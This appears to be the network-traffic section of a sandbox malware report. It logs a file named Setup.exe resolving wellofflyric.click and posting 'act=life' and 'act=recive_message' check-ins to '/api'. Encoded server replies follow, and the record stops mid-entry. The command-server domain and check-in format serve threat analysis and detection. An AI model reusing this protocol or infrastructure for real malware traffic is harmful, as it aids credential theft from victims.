Dec 24, 2024 01:26:34.804064035 CET	443	49736	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:34.804092884 CET	49736	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:34.804100037 CET	443	49736	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:34.804147959 CET	49736	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:34.804764986 CET	443	49736	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:34.811861992 CET	443	49736	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:34.811918974 CET	49736	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:34.811928988 CET	443	49736	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:34.822525024 CET	443	49736	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:34.822580099 CET	49736	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:34.822587967 CET	443	49736	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:34.867129087 CET	49736	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:34.923074007 CET	443	49736	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:34.923129082 CET	443	49736	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:34.923176050 CET	49736	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:34.923192978 CET	443	49736	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:34.923213959 CET	443	49736	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:34.923265934 CET	49736	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:34.923335075 CET	49736	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:34.923346043 CET	443	49736	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:34.923363924 CET	49736	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:34.923369884 CET	443	49736	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:35.094119072 CET	49738	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:35.094146013 CET	443	49738	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:35.094218969 CET	49738	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:35.094520092 CET	49738	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:35.094531059 CET	443	49738	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:36.307641029 CET	443	49738	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:36.307707071 CET	49738	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:36.308895111 CET	49738	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:36.308902025 CET	443	49738	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:36.309101105 CET	443	49738	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:36.316893101 CET	49738	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:36.317023993 CET	49738	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:36.317050934 CET	443	49738	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:36.317111969 CET	49738	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:36.317117929 CET	443	49738	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:37.280482054 CET	443	49738	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:37.280580044 CET	443	49738	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:37.280630112 CET	49738	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:37.280719995 CET	49738	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:37.280736923 CET	443	49738	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:37.383934975 CET	49739	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:37.384032965 CET	443	49739	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:37.384119987 CET	49739	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:37.384386063 CET	49739	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:37.384422064 CET	443	49739	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:38.598437071 CET	443	49739	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:38.598522902 CET	49739	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:38.599570036 CET	49739	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:38.599602938 CET	443	49739	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:38.599844933 CET	443	49739	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:38.601454973 CET	49739	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:38.601605892 CET	49739	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:38.601649046 CET	443	49739	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:39.406656027 CET	443	49739	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:39.406747103 CET	443	49739	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:39.406800985 CET	49739	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:39.406928062 CET	49739	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:39.406949997 CET	443	49739	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:39.606198072 CET	49740	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:39.606249094 CET	443	49740	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:39.606394053 CET	49740	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:39.606821060 CET	49740	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:39.606834888 CET	443	49740	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:40.819138050 CET	443	49740	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:40.819228888 CET	49740	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:40.820466042 CET	49740	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:40.820473909 CET	443	49740	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:40.820702076 CET	443	49740	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:40.822197914 CET	49740	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:40.822375059 CET	49740	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:40.822410107 CET	443	49740	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:40.822474003 CET	49740	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:40.822480917 CET	443	49740	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:41.780849934 CET	443	49740	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:41.780951023 CET	443	49740	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:41.781001091 CET	49740	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:41.781261921 CET	49740	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:41.781277895 CET	443	49740	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:42.072933912 CET	49741	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:42.072952986 CET	443	49741	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:42.073010921 CET	49741	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:42.073384047 CET	49741	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:42.073395014 CET	443	49741	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:43.285051107 CET	443	49741	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:43.285119057 CET	49741	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:43.290266991 CET	49741	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:43.290273905 CET	443	49741	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:43.290491104 CET	443	49741	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:43.291739941 CET	49741	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:43.291987896 CET	49741	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:43.291992903 CET	443	49741	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:44.072377920 CET	443	49741	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:44.072454929 CET	443	49741	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:44.072514057 CET	49741	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:44.072632074 CET	49741	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:44.072652102 CET	443	49741	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:44.145106077 CET	49742	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:44.145134926 CET	443	49742	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:44.145216942 CET	49742	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:44.145442963 CET	49742	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:44.145454884 CET	443	49742	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:45.356581926 CET	443	49742	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:45.356692076 CET	49742	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:45.358019114 CET	49742	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:45.358032942 CET	443	49742	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:45.358242035 CET	443	49742	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:45.362781048 CET	49742	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:45.362855911 CET	49742	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:45.362862110 CET	443	49742	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:46.485687971 CET	443	49742	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:46.485781908 CET	443	49742	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:46.485841990 CET	49742	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:46.486063004 CET	49742	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:46.486076117 CET	443	49742	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:46.489202023 CET	49743	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:46.489289045 CET	443	49743	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:46.489379883 CET	49743	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:46.489788055 CET	49743	443	192.168.2.4	188.114.96.6
Dec 24, 2024 01:26:46.489825964 CET	443	49743	188.114.96.6	192.168.2.4
Dec 24, 2024 01:26:47.039098978 CET	49743	443	192.168.2.4	188.114.96.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 01:26:19.067534924 CET	52465	53	192.168.2.4	1.1.1.1
Dec 24, 2024 01:26:19.544399977 CET	53	52465	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 24, 2024 01:26:19.067534924 CET	192.168.2.4	1.1.1.1	0x16d4	Standard query (0)	wellofflyric.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 24, 2024 01:26:19.544399977 CET	1.1.1.1	192.168.2.4	0x16d4	No error (0)	wellofflyric.click		188.114.96.6	A (IP address)	IN (0x0001)	false
Dec 24, 2024 01:26:19.544399977 CET	1.1.1.1	192.168.2.4	0x16d4	No error (0)	wellofflyric.click		188.114.97.6	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

wellofflyric.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	188.114.96.6	443	6996	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 00:26:20 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: wellofflyric.click
2024-12-24 00:26:20 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-24 00:26:32 UTC	1125	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 00:26:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gfmlp1m563iihkfcpu58dbqmt9; expires=Fri, 18 Apr 2025 18:13:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JMeqQgO5PYm4s4Hpedc6l7yQyhErxr8RIsUtbp8nu4BzHeHv2vgFj1WGsF6xCfs58Cwa65mYmYaFtsX%2FpFcgBWKdLCf5h2ojLnnJ%2BXTFSdpbndy9hFUNYJ5dXcvv3EirtU4XsWo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c759a3a9d43bb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1750&min_rtt=1750&rtt_var=875&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4230&recv_bytes=909&delivery_rate=44132&cwnd=228&unsent_bytes=0&cid=b840f8201119aeb1&ts=11998&x=0"
2024-12-24 00:26:32 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-24 00:26:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	188.114.96.6	443	6996	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 00:26:34 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 78 Host: wellofflyric.click
2024-12-24 00:26:34 UTC	78	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--ALFA&j=efdebde057a1df3f7c15b7f4da907c2d
2024-12-24 00:26:34 UTC	1129	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 00:26:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bld78lpv95j65pnppjv44n23l2; expires=Fri, 18 Apr 2025 18:13:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sCNbxHtyz0f8HD%2BhU88YiwI89bINQuEbTemengZdmR3Sju9Fo2wPa77vu8%2BMhNzoTJcnDVUCX1t1HXxfzkupZJXZHwZhupYsGob8%2FK581KCE745obuzljrqy%2FECQtYuT5nNfgBs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c75ec7f9d8c63-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1985&min_rtt=1984&rtt_var=747&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=980&delivery_rate=1460730&cwnd=226&unsent_bytes=0&cid=136c0b1289dbf857&ts=775&x=0"
2024-12-24 00:26:34 UTC	240	IN	Data Raw: 31 34 39 34 0d 0a 30 72 6e 44 4c 62 64 42 59 54 61 57 42 43 55 53 4a 33 5a 66 57 32 4a 72 48 2f 50 75 2f 36 63 6c 62 47 54 59 54 41 5a 34 2b 34 57 70 6d 37 55 50 6a 58 56 4e 46 4f 56 68 42 79 68 42 46 7a 4d 6f 42 30 63 39 6b 6f 72 64 6e 55 4d 4e 43 4b 73 70 4b 6c 71 4e 36 50 43 44 70 55 7a 62 4d 67 51 61 74 47 46 64 4d 42 30 74 4a 48 6b 48 42 54 33 4a 7a 4a 72 4e 52 77 30 49 75 69 31 74 46 34 76 70 73 64 47 76 53 74 38 6b 41 6c 4c 33 61 45 68 33 51 68 4d 2b 4d 51 77 43 63 70 75 44 33 59 73 48 43 52 37 36 64 69 51 31 6e 76 47 7a 39 4b 4a 65 33 47 4d 63 47 75 30 6d 51 48 77 46 54 48 30 36 42 77 6c 7a 6c 59 71 55 7a 30 30 45 41 4c 73 6f 62 41 69 53 34 37 72 52 6f 55 6e 65 4c 67 74 47 2b 6d 4a 50 66 45 51 5a 50 6e Data Ascii: 14940rnDLbdBYTaWBCUSJ3ZfW2JrH/Pu/6clbGTYTAZ4+4Wpm7UPjXVNFOVhByhBFzMoB0c9kordnUMNCKspKlqN6PCDpUzbMgQatGFdMB0tJHkHBT3JzJrNRw0Iui1tF4vpsdGvSt8kAlL3aEh3QhM+MQwCcpuD3YsHCR76diQ1nvGz9KJe3GMcGu0mQHwFTH06BwlzlYqUz00EALsobAiS47rRoUneLgtG+mJPfEQZPn
2024-12-24 00:26:34 UTC	1369	IN	Data Raw: 6c 4f 53 58 71 4a 7a 4d 57 46 46 44 77 46 71 7a 39 78 46 34 6e 68 38 4d 54 76 56 70 55 6b 44 78 53 73 4a 6b 39 38 53 78 45 2b 4e 67 63 49 66 59 4f 44 6e 63 5a 50 42 67 4b 77 49 57 73 56 6c 2b 32 33 30 36 68 49 32 69 51 4c 55 76 74 6c 42 7a 34 46 45 79 56 35 57 45 6c 64 67 59 2b 65 30 55 6f 66 52 71 56 67 66 56 71 65 36 2f 43 44 34 55 6e 62 49 67 35 55 35 6d 35 4d 65 30 41 47 4e 6a 41 4e 42 48 32 63 68 70 4c 47 52 77 6b 4d 73 43 46 75 48 70 54 71 74 74 75 68 44 35 74 6a 42 45 79 30 50 67 64 54 51 41 51 36 4e 52 5a 4c 52 39 47 54 30 39 77 48 43 51 72 36 64 69 51 53 6e 4f 53 7a 30 4b 35 4d 33 53 67 52 56 4f 5a 67 53 6e 56 58 45 6a 67 33 43 67 70 76 6d 34 4b 62 78 6b 34 46 44 37 38 70 59 46 72 58 70 37 66 44 34 52 65 56 41 67 35 66 2b 47 78 51 63 41 55 4c 63 Data Ascii: lOSXqJzMWFFDwFqz9xF4nh8MTvVpUkDxSsJk98SxE+NgcIfYODncZPBgKwIWsVl+2306hI2iQLUvtlBz4FEyV5WEldgY+e0UofRqVgfVqe6/CD4UnbIg5U5m5Me0AGNjANBH2chpLGRwkMsCFuHpTqttuhD5tjBEy0PgdTQAQ6NRZLR9GT09wHCQr6diQSnOSz0K5M3SgRVOZgSnVXEjg3Cgpvm4Kbxk4FD78pYFrXp7fD4ReVAg5f+GxQcAULc
2024-12-24 00:26:34 UTC	1369	IN	Data Raw: 76 6e 59 61 62 79 6b 6f 43 52 76 52 75 59 77 4c 5a 76 2f 44 78 6f 6c 76 57 4b 55 46 68 39 32 68 4a 64 31 4e 55 49 6e 63 5a 53 58 71 64 7a 4d 57 46 53 67 38 4f 76 44 78 72 46 35 72 70 76 74 53 6b 51 4e 30 6a 41 31 6e 78 59 6b 78 37 52 68 6b 35 4b 77 6f 4a 64 5a 53 4e 6c 38 38 48 51 45 61 39 4e 69 52 43 32 64 61 6e 30 4f 4e 36 31 69 30 4e 55 2b 49 6d 57 44 35 63 56 44 6f 31 51 46 45 39 6e 49 53 59 77 45 67 50 44 4c 51 72 62 68 61 52 36 62 50 4a 72 6b 76 56 4c 77 74 65 2b 57 68 44 65 45 77 66 4e 6a 38 41 43 48 66 52 77 74 33 43 58 30 35 65 2b 68 70 6a 46 70 54 6f 38 75 36 69 51 64 73 6b 46 52 54 72 4b 46 34 77 51 68 68 39 59 55 41 46 64 4a 47 48 6c 38 46 48 43 51 75 2f 4c 57 4d 5a 6c 4f 43 36 31 61 5a 4c 32 53 6f 4f 55 76 52 68 51 33 56 58 45 54 51 31 44 45 Data Ascii: vnYabykoCRvRuYwLZv/DxolvWKUFh92hJd1NUIncZSXqdzMWFSg8OvDxrF5rpvtSkQN0jA1nxYkx7Rhk5KwoJdZSNl88HQEa9NiRC2dan0ON61i0NU+ImWD5cVDo1QFE9nISYwEgPDLQrbhaR6bPJrkvVLwte+WhDeEwfNj8ACHfRwt3CX05e+hpjFpTo8u6iQdskFRTrKF4wQhh9YUAFdJGHl8FHCQu/LWMZlOC61aZL2SoOUvRhQ3VXETQ1DE
2024-12-24 00:26:34 UTC	1369	IN	Data Raw: 33 64 6f 4a 46 30 61 39 49 69 52 43 32 65 36 35 79 61 39 42 33 43 34 46 58 50 4e 6f 53 6e 74 44 48 7a 6f 2b 42 67 52 31 6e 49 6d 65 78 45 4d 45 46 4c 6b 6c 62 68 65 54 70 2f 36 62 70 6c 65 56 65 30 4e 7a 2b 45 39 58 61 31 63 43 66 53 5a 4f 45 44 32 57 67 4e 32 64 42 77 30 4a 73 79 46 73 45 70 62 6f 74 4e 57 6e 53 64 67 6d 44 46 37 6d 62 6b 6c 39 54 68 73 32 4b 77 41 45 65 5a 32 49 6c 63 35 4e 54 6b 6a 36 4b 58 78 61 77 61 65 46 31 71 35 50 31 6a 56 44 53 37 70 2f 42 33 64 4a 56 47 56 35 44 41 64 39 6e 6f 43 52 7a 6b 38 50 43 72 51 70 59 52 4f 52 37 36 4c 61 70 55 66 55 4c 51 78 56 38 47 4e 43 64 45 49 51 4f 7a 5a 41 52 7a 32 57 6c 4e 32 64 42 79 45 68 6a 32 78 46 49 4e 6e 34 2f 73 4c 68 53 4e 6c 6a 57 78 54 34 5a 55 74 34 53 68 49 30 4e 51 6f 41 64 70 32 Data Ascii: 3doJF0a9IiRC2e65ya9B3C4FXPNoSntDHzo+BgR1nImexEMEFLklbheTp/6bpleVe0Nz+E9Xa1cCfSZOED2WgN2dBw0JsyFsEpbotNWnSdgmDF7mbkl9Ths2KwAEeZ2Ilc5NTkj6KXxawaeF1q5P1jVDS7p/B3dJVGV5DAd9noCRzk8PCrQpYROR76LapUfULQxV8GNCdEIQOzZARz2WlN2dByEhj2xFINn4/sLhSNljWxT4ZUt4ShI0NQoAdp2
2024-12-24 00:26:34 UTC	929	IN	Data Raw: 41 6f 44 74 53 39 6c 48 49 76 67 75 63 6d 76 51 74 6f 72 43 31 33 31 59 6b 4a 39 51 78 67 33 4f 41 63 48 63 35 6e 4d 30 34 56 41 46 6b 62 69 62 6b 55 4b 67 76 57 6d 31 6f 42 43 32 6d 4d 63 47 75 30 6d 51 48 77 46 54 48 30 77 45 67 31 77 67 34 57 61 79 30 67 4e 46 4c 73 6a 62 77 69 65 36 4c 54 63 72 55 6e 61 4a 51 4a 52 2f 6d 70 41 64 55 34 62 4d 58 6c 4f 53 58 71 4a 7a 4d 57 46 61 51 55 56 72 53 31 71 45 59 2f 38 38 4d 54 76 56 70 55 6b 44 78 53 73 4a 6b 52 37 54 68 41 39 4e 51 41 4e 63 4a 47 65 6b 73 4a 41 42 77 32 6f 4a 47 4d 64 6b 75 2b 37 31 4b 64 64 32 53 30 52 55 65 5a 30 42 7a 34 46 45 79 56 35 57 45 6c 4c 6c 70 79 4e 78 67 55 2f 45 4c 6b 34 62 78 65 56 70 36 2b 56 75 41 2f 53 4c 30 4d 4d 74 47 42 49 65 55 59 62 50 44 41 4d 42 48 69 59 69 5a 7a 44 Data Ascii: AoDtS9lHIvgucmvQtorC131YkJ9Qxg3OAcHc5nM04VAFkbibkUKgvWm1oBC2mMcGu0mQHwFTH0wEg1wg4Way0gNFLsjbwie6LTcrUnaJQJR/mpAdU4bMXlOSXqJzMWFaQUVrS1qEY/88MTvVpUkDxSsJkR7ThA9NQANcJGeksJABw2oJGMdku+71Kdd2S0RUeZ0Bz4FEyV5WElLlpyNxgU/ELk4bxeVp6+VuA/SL0MMtGBIeUYbPDAMBHiYiZzD
2024-12-24 00:26:34 UTC	1369	IN	Data Raw: 32 35 66 34 0d 0a 4e 67 63 50 65 5a 47 48 6d 73 74 42 43 77 32 7a 62 69 70 61 6e 76 2f 77 67 2b 46 70 39 6a 45 52 5a 76 70 6c 58 44 42 61 57 69 52 35 42 77 55 39 79 63 79 57 7a 55 67 63 41 37 4d 6d 59 42 4f 5a 34 37 72 57 70 6b 2f 51 4c 67 5a 51 2b 6d 4a 41 63 45 6b 62 4f 6a 45 50 44 58 32 65 7a 4e 4f 46 51 42 5a 47 34 6d 35 45 45 59 2f 47 76 74 43 7a 44 38 70 74 47 68 54 7a 61 67 63 6f 42 52 6f 30 4f 41 67 48 63 5a 6d 49 6a 38 56 4d 42 77 6d 37 49 57 51 5a 6d 4f 32 34 79 61 64 50 33 69 73 45 58 50 42 6f 56 58 46 4b 56 48 4e 35 42 78 45 39 79 63 79 73 30 30 41 4a 43 66 67 48 59 77 47 59 37 62 50 51 72 51 2f 4b 62 52 6f 55 38 32 6f 48 4b 41 55 5a 4d 54 51 45 47 33 47 52 6a 4a 54 43 54 52 77 4a 74 53 4e 6e 47 70 7a 31 73 63 6d 75 52 4e 41 67 42 31 76 37 61 Data Ascii: 25f4NgcPeZGHmstBCw2zbipanv/wg+Fp9jERZvplXDBaWiR5BwU9ycyWzUgcA7MmYBOZ47rWpk/QLgZQ+mJAcEkbOjEPDX2ezNOFQBZG4m5EEY/GvtCzD8ptGhTzagcoBRo0OAgHcZmIj8VMBwm7IWQZmO24yadP3isEXPBoVXFKVHN5BxE9ycys00AJCfgHYwGY7bPQrQ/KbRoU82oHKAUZMTQEG3GRjJTCTRwJtSNnGpz1scmuRNAgB1v7a
2024-12-24 00:26:34 UTC	1369	IN	Data Raw: 63 50 6a 63 49 41 48 32 66 6a 4a 7a 49 52 30 35 49 2b 69 6c 38 57 73 47 6e 6c 66 69 32 57 64 39 68 49 45 50 69 62 45 42 38 55 78 38 38 4f 68 59 45 62 64 48 43 33 64 52 41 48 30 62 69 4f 48 51 4e 6e 76 6a 2b 77 75 46 49 32 57 4e 62 46 50 39 70 53 58 31 4f 45 44 51 38 43 41 70 34 6c 49 61 52 79 55 59 47 44 37 41 72 59 52 79 54 35 4c 37 55 6f 45 50 52 4b 67 31 64 74 43 67 48 64 31 31 55 5a 58 6b 32 47 58 71 4a 67 59 32 48 64 51 30 58 71 7a 74 70 43 70 2b 6c 6e 39 69 74 54 4e 41 6b 45 78 54 72 4b 46 34 77 51 68 68 39 59 55 41 4a 65 5a 32 50 6d 73 74 49 41 77 6d 39 4a 57 73 51 6c 2f 57 2f 33 71 6c 44 33 53 34 52 58 76 35 30 54 6e 6c 49 47 6a 55 72 41 30 6b 7a 30 59 75 46 68 52 39 4f 4e 4c 41 74 61 41 79 55 36 50 44 45 37 31 61 56 4a 41 38 55 72 43 5a 56 59 6b Data Ascii: cPjcIAH2fjJzIR05I+il8WsGnlfi2Wd9hIEPibEB8Ux88OhYEbdHC3dRAH0biOHQNnvj+wuFI2WNbFP9pSX1OEDQ8CAp4lIaRyUYGD7ArYRyT5L7UoEPRKg1dtCgHd11UZXk2GXqJgY2HdQ0XqztpCp+ln9itTNAkExTrKF4wQhh9YUAJeZ2PmstIAwm9JWsQl/W/3qlD3S4RXv50TnlIGjUrA0kz0YuFhR9ONLAtaAyU6PDE71aVJA8UrCZVYk
2024-12-24 00:26:34 UTC	1369	IN	Data Raw: 44 30 6b 6c 71 4d 7a 56 68 58 68 41 52 71 4a 75 50 46 71 73 35 4c 37 56 70 6c 6e 45 62 69 4e 66 34 6d 64 4b 65 30 6c 57 50 44 51 51 44 6a 33 66 7a 4a 75 46 48 31 35 49 2b 69 70 31 57 73 47 33 34 6f 44 30 48 49 4a 7a 55 55 75 36 66 77 64 6d 42 55 78 76 64 30 41 62 50 63 6e 4d 32 73 5a 56 48 41 43 35 4f 47 64 64 70 39 6d 51 30 4b 31 4d 32 53 49 45 46 4c 6f 6d 53 44 41 64 4c 58 30 36 45 68 73 79 67 4a 71 51 31 55 42 43 44 71 73 6a 61 46 72 58 70 2f 7a 66 71 6b 50 51 4a 42 4d 62 35 6e 5a 4d 66 46 4e 59 4f 53 74 41 52 7a 32 41 68 35 4c 58 53 51 6c 4a 71 7a 68 70 43 70 72 69 74 35 65 70 58 74 67 76 51 78 71 30 63 30 78 38 51 78 6b 6f 64 68 45 66 66 6f 65 4c 30 63 31 57 41 77 72 36 45 53 70 61 67 61 66 6f 6d 35 52 4d 32 79 30 45 51 75 55 72 5a 33 74 4a 46 7a 45 Data Ascii: 